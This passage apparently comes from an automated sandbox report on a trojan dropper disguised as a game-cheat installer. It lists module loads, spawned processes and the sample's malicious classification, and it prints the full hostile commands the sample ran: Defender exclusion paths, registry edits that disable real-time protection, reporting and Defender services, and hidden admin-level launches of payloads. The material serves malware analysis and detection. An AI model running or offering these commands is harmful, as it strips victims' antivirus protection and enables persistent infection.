            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: JWQgbclQK5Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            Source: classification engineClassification label: mal100.troj.evad.win@261/1107@1/11
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\OpenSource
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile created: C:\Users\user\AppData\Roaming\OpenSource
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4064:120:WilError_03
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeMutant created: \Sessions\1\BaseNamedObjects\Vvouaqo
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeMutant created: \Sessions\1\BaseNamedObjects\Uhivhcyle
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\progressgood.bat" "
            Source: JWQgbclQK5Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: JWQgbclQK5ReversingLabs: Detection: 69%
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile read: C:\Users\user\Desktop\JWQgbclQK5.exe
            Source: unknownProcess created: C:\Users\user\Desktop\JWQgbclQK5.exe "C:\Users\user\Desktop\JWQgbclQK5.exe"
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe .\Install_YTTCHTs.exe
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E0A36685E052AA6AB614A5D414986D64 C
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1711662176 " ALLUSERS="1"
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\progressgood.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5A985AC032B9C93F6690101D7D0915B7 E Global\MSI0000
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI551D.tmp "C:\Windows\Installer\MSI551D.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe .\Install_YTTCHTs.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Installer\MSI551D.tmpProcess created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1711662176 " ALLUSERS="1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E0A36685E052AA6AB614A5D414986D64 C
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5A985AC032B9C93F6690101D7D0915B7 E Global\MSI0000
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBF81.tmp "C:\Windows\Installer\MSIBF81.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
